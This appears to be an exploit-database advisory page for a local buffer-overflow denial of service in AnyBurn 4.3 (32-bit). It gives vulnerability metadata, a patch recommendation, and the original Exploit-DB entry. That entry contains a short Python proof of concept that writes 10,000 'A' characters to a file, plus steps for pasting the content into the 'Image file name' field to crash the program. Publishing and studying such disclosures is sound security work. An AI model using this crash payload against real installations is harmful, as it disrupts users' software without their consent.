AnyBurn

vendor:

AnyBurn

by:

Achilles

7.5

CVSS

HIGH

Denial of Service (DoS) Local Buffer Overflow

119

CWE

Product Name: AnyBurn

Affected Version From: 4.3 (32-bit)

Affected Version To: 4.3 (32-bit)

Patch Exists: Yes

Related CWE: N/A

CPE: //a:anyburn

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64

2018

AnyBurn is vulnerable to a Denial of Service (DoS) Local Buffer Overflow vulnerability. This vulnerability is caused by a lack of proper validation of user-supplied input when creating an image file. An attacker can exploit this vulnerability by creating a malicious file containing a large amount of data and then copying it to the clipboard. When the user attempts to create an image file using the 'Copy disk to Image' option in AnyBurn, the malicious data will be copied into the 'Image file name' field, resulting in a crash.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of AnyBurn.

Source

Exploit-DB raw data:

# Exploit Title: AnyBurn
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
# 5.- Click 'Create Now' and you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
 f=open("Evil.txt","w")
 print "[+] Creating %s bytes evil payload.." %len(buffer)
 f.write(buffer)
 f.close()
 print "[+] File created!"
except:
 print "File cannot be created"